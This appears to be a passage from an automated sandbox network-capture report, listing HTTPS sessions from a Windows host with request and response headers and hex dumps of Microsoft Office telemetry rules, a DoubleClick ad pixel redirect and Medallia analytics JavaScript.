                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      143192.168.2.949949142.250.185.1304433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC794OUTGET /pixel?google_nid=adobe_dmp&google_cm&gdpr=0&gdpr_consent=&google_hm=MjY1OTQyNTA5ODIxNzUwNzY3MTQyNTkzMTg3Njc3NDY3ODI0Nzk= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: cm.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                      Referer: https://bellca.demdex.net/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC880INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                      P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=adobe_dmp&google_cm=&gdpr=0&gdpr_consent=&google_hm=MjY1OTQyNTA5ODIxNzUwNzY3MTQyNTkzMTg3Njc3NDY3ODI0Nzk=&google_tc=
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                                                                                                                                                                                                                      Content-Length: 378
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 31-Oct-2024 13:27:14 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC378INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 61 64 6f 62 65 5f 64 6d 70 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 63 6d 3d 26 61 6d 70 3b 67 64 70 72 3d 30 26 61 6d 70 3b 67
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://cm.g.doubleclick.net/pixel?google_nid=adobe_dmp&amp;google_cm=&amp;gdpr=0&amp;g


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      144192.168.2.94994413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6035d9fd-201e-00aa-6710-2b3928000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131214Z-15b8d89586ffsjj9qb0gmb1stn0000000dwg000000001mtc
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      145192.168.2.94994613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: cb3ec3ab-c01e-0014-40b8-26a6a3000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131214Z-16849878b78tg5n42kspfr0x4800000009h000000000eru9
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      146192.168.2.949950130.61.120.24433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC475OUTGET /i/14028/693653/di.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: cdn.decibelinsight.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC793INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 211386
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      x-di-debug: node=c093-248-eu-frankfurt-1 df=62023
                                                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=5400
                                                                                                                                                                                                                                                                                                                                      ETag: W/012555147-192E2B486A1
                                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Cache-Control, Pragma, If-None-Match, Accept, X-HTTP-Method-Override, X-DI-jspsf, X-DI-cookieflags, X-DI-sid, X-DI-lid, X-DI-lid-renew, X-DI-sid-renew, X-DI-lid-time, X-DI-int-state
                                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 604800
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000, h2=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC7399INData Raw: 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 4d 65 64 61 6c 6c 69 61 20 49 6e 63 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 65 64 61 6c 6c 69 61 2e 63 6f 6d 2f 0a 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 64 61 5f 3d 77 69 6e 64 6f 77 2e 5f 64 61 5f 7c 7c 5b 5d 3b 5f 64 61 5f 5b 27 6a 73 56 65 72 73 69 6f 6e 27 5d 3d 31 37 32 30 34 37 31 31 31 38 3b 5f 64 61 5f 5b 22 64 61 5f 77 65 62 73 69 74 65 49 64 22 5d 20 3d 20 36 39 33 36 35 33 3b 5f 64 61 5f 5b 22 72 65 74 75 72 6e 56 69 73 69 74 22 5d 20 3d 20 66 61 6c 73 65 3b 5f 64 61 5f 5b 22 61 63 63 6f 75 6e 74 4e 75 6d 62 65 72 22 5d 20 3d 20 31 34 30 32 38 3b 5f 64 61 5f 5b 22 64 61 5f 64 6e 73 52 65 63 6f 72 64 22 5d 20 3d 20 22 63 6f 6c 6c 65 63 74 69 6f 6e 2e 64 65 63 69 62 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: /** * Copyright 2024 Medallia Inc. * https://www.medallia.com/ */window._da_=window._da_||[];_da_['jsVersion']=1720471118;_da_["da_websiteId"] = 693653;_da_["returnVisit"] = false;_da_["accountNumber"] = 14028;_da_["da_dnsRecord"] = "collection.decibe
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC8192INData Raw: 65 22 29 3b 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 61 63 68 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4c 49 43 45 4e 53 45 2d 32 2e 30 0a 20 2a 2f 0a 2f 2a 2a 0a 20 2a 20 53 69 7a 7a 6c 65 20 43 53 53 20 53 65 6c 65 63 74 6f 72 20 45 6e 67 69 6e 65 20 76 32 2e 32 2e 31 2d 70 72 65 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3b 69 66 28 62 29 66 6f 72 28 64 3d 62 2e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: e"); * http://www.apache.org/licenses/LICENSE-2.0 *//** * Sizzle CSS Selector Engine v2.2.1-pre * http://sizzlejs.com/ * Released under the MIT license * http://jquery.org/license */!function(){"use strict";function a(a,b,c){var d,e;if(b)for(d=b.
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC8192INData Raw: 5b 30 5d 2c 61 5b 30 5d 29 29 2c 63 3d 4f 62 2e 61 62 73 28 62 5b 32 5d 2d 62 5b 30 5d 29 2c 64 3d 4f 62 2e 61 62 73 28 61 5b 32 5d 2d 61 5b 30 5d 29 2c 66 3d 65 2f 28 28 63 2b 64 29 2f 32 29 2a 31 30 30 2c 66 3e 38 30 26 26 4f 62 2e 61 62 73 28 61 5b 31 5d 2d 62 5b 33 5d 29 3c 33 30 3f 28 62 5b 30 5d 3d 4f 62 2e 6d 69 6e 28 62 5b 30 5d 2c 61 5b 30 5d 29 2c 62 5b 31 5d 3d 4f 62 2e 6d 69 6e 28 62 5b 31 5d 2c 61 5b 31 5d 29 2c 62 5b 32 5d 3d 4f 62 2e 6d 61 78 28 62 5b 32 5d 2c 61 5b 32 5d 29 2c 62 5b 33 5d 3d 4f 62 2e 6d 61 78 28 62 5b 33 5d 2c 61 5b 33 5d 29 2c 62 5b 34 5d 2b 3d 61 5b 34 5d 29 3a 67 2e 70 75 73 68 28 61 29 7d 29 29 2c 67 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 4c 62 2e 63 72 65 61 74 65 52 61 6e 67 65 28 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: [0],a[0])),c=Ob.abs(b[2]-b[0]),d=Ob.abs(a[2]-a[0]),f=e/((c+d)/2)*100,f>80&&Ob.abs(a[1]-b[3])<30?(b[0]=Ob.min(b[0],a[0]),b[1]=Ob.min(b[1],a[1]),b[2]=Ob.max(b[2],a[2]),b[3]=Ob.max(b[3],a[3]),b[4]+=a[4]):g.push(a)})),g}function oa(a,b){var c=Lb.createRange()
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC8192INData Raw: 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 78 62 28 61 2c 62 29 7b 62 2e 64 61 5f 73 69 64 26 26 28 61 5b 22 58 2d 44 49 2d 73 69 64 22 5d 3d 62 2e 64 61 5f 73 69 64 29 2c 62 2e 64 61 5f 6c 69 64 26 26 28 61 5b 22 58 2d 44 49 2d 6c 69 64 22 5d 3d 62 2e 64 61 5f 6c 69 64 29 2c 2b 62 2e 64 61 5f 66 72 6f 6d 5f 6e 61 74 69 76 65 26 26 28 49 28 22 5f 64 61 5f 66 72 6f 6d 5f 6e 61 74 69 76 65 22 2c 31 29 2c 2b 62 2e 64 61 5f 69 6e 5f 73 61 6d 70 6c 65 26 26 28 61 5b 22 58 2d 44 49 2d 63 6f 6f 6b 69 65 66 6c 61 67 73 22 5d 3d 22 31 7c 30 7c 31 7c 30 7c 31 7c 30 22 2c 61 5b 22 58 2d 44 49 2d 6a 73 70 73 66 22 5d 3d 31 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 62 28 61 29 7b 76 61 72 20 62 3d 43 28 22 64 5f 69 6e 74 5f 73 74 61 74
                                                                                                                                                                                                                                                                                                                                      Data Ascii: rn Math.round(a)}function xb(a,b){b.da_sid&&(a["X-DI-sid"]=b.da_sid),b.da_lid&&(a["X-DI-lid"]=b.da_lid),+b.da_from_native&&(I("_da_from_native",1),+b.da_in_sample&&(a["X-DI-cookieflags"]="1|0|1|0|1|0",a["X-DI-jspsf"]=1))}function yb(a){var b=C("d_int_stat
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC8192INData Raw: 70 6c 79 28 6e 75 6c 6c 2c 61 5b 68 5d 2e 6d 61 74 63 68 65 73 29 2c 63 5b 4d 5d 29 7b 66 6f 72 28 64 3d 2b 2b 68 3b 65 3e 64 26 26 21 76 2e 72 65 6c 61 74 69 76 65 5b 61 5b 64 5d 2e 74 79 70 65 5d 3b 64 2b 2b 29 3b 72 65 74 75 72 6e 20 71 28 68 3e 31 26 26 6e 28 6b 29 2c 68 3e 31 26 26 6c 28 61 2e 73 6c 69 63 65 28 30 2c 68 2d 31 29 2e 63 6f 6e 63 61 74 28 7b 76 61 6c 75 65 3a 22 20 22 3d 3d 3d 61 5b 68 2d 32 5d 2e 74 79 70 65 3f 22 2a 22 3a 22 22 7d 29 29 2e 72 65 70 6c 61 63 65 28 67 61 2c 22 24 31 22 29 2c 63 2c 64 3e 68 26 26 72 28 61 2e 73 6c 69 63 65 28 68 2c 64 29 29 2c 65 3e 64 26 26 72 28 61 3d 61 2e 73 6c 69 63 65 28 64 29 29 2c 65 3e 64 26 26 6c 28 61 29 29 7d 6b 2e 70 75 73 68 28 63 29 7d 72 65 74 75 72 6e 20 6e 28 6b 29 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ply(null,a[h].matches),c[M]){for(d=++h;e>d&&!v.relative[a[d].type];d++);return q(h>1&&n(k),h>1&&l(a.slice(0,h-1).concat({value:" "===a[h-2].type?"*":""})).replace(ga,"$1"),c,d>h&&r(a.slice(h,d)),e>d&&r(a=a.slice(d)),e>d&&l(a))}k.push(c)}return n(k)}functi
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC8192INData Raw: 77 65 72 43 61 73 65 28 29 2c 22 6e 74 68 22 3d 3d 3d 62 5b 31 5d 2e 73 6c 69 63 65 28 30 2c 33 29 3f 28 62 5b 33 5d 7c 7c 61 2e 65 72 72 6f 72 28 62 5b 30 5d 29 2c 62 5b 34 5d 3d 2b 28 62 5b 34 5d 3f 62 5b 35 5d 2b 28 62 5b 36 5d 7c 7c 31 29 3a 32 2a 28 22 65 76 65 6e 22 3d 3d 3d 62 5b 33 5d 7c 7c 22 6f 64 64 22 3d 3d 3d 62 5b 33 5d 29 29 2c 62 5b 35 5d 3d 2b 28 62 5b 37 5d 2b 62 5b 38 5d 7c 7c 22 6f 64 64 22 3d 3d 3d 62 5b 33 5d 29 29 3a 62 5b 33 5d 26 26 61 2e 65 72 72 6f 72 28 62 5b 30 5d 29 2c 62 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 3d 21 61 5b 36 5d 26 26 61 5b 32 5d 3b 72 65 74 75 72 6e 20 6d 61 2e 43 48 49 4c 44 2e 74 65 73 74 28 61 5b 30 5d 29 3f 6e 75 6c 6c 3a 28 61 5b 33 5d 3f 61 5b 32 5d 3d 61 5b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: werCase(),"nth"===b[1].slice(0,3)?(b[3]||a.error(b[0]),b[4]=+(b[4]?b[5]+(b[6]||1):2*("even"===b[3]||"odd"===b[3])),b[5]=+(b[7]+b[8]||"odd"===b[3])):b[3]&&a.error(b[0]),b},PSEUDO:function(a){var b,c=!a[6]&&a[2];return ma.CHILD.test(a[0])?null:(a[3]?a[2]=a[
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC8192INData Raw: 3d 64 2e 6c 65 6e 67 74 68 2c 68 3d 4d 61 74 68 2e 63 65 69 6c 28 28 66 2b 67 29 2f 32 29 2c 69 3d 68 2c 6a 3d 32 2a 68 2c 6b 3d 6e 65 77 20 41 72 72 61 79 28 6a 29 2c 6c 3d 6e 65 77 20 41 72 72 61 79 28 6a 29 2c 6d 3d 30 3b 6a 3e 6d 3b 6d 2b 2b 29 6b 5b 6d 5d 3d 2d 31 2c 6c 5b 6d 5d 3d 2d 31 3b 6b 5b 69 2b 31 5d 3d 30 2c 6c 5b 69 2b 31 5d 3d 30 3b 66 6f 72 28 76 61 72 20 6e 3d 66 2d 67 2c 6f 3d 6e 25 32 21 3d 30 2c 70 3d 30 2c 71 3d 30 2c 72 3d 30 2c 73 3d 30 2c 74 3d 30 3b 68 3e 74 26 26 21 28 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3e 65 29 3b 74 2b 2b 29 7b 66 6f 72 28 76 61 72 20 75 3d 2d 74 2b 70 3b 74 2d 71 3e 3d 75 3b 75 2b 3d 32 29 7b 76 61 72 20 76 2c 77 3d 69 2b 75 3b 76 3d 75 3d 3d 2d 74 7c 7c 75 21 3d 74 26 26 6b 5b 77 2d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: =d.length,h=Math.ceil((f+g)/2),i=h,j=2*h,k=new Array(j),l=new Array(j),m=0;j>m;m++)k[m]=-1,l[m]=-1;k[i+1]=0,l[i+1]=0;for(var n=f-g,o=n%2!=0,p=0,q=0,r=0,s=0,t=0;h>t&&!((new Date).getTime()>e);t++){for(var u=-t+p;t-q>=u;u+=2){var v,w=i+u;v=u==-t||u!=t&&k[w-
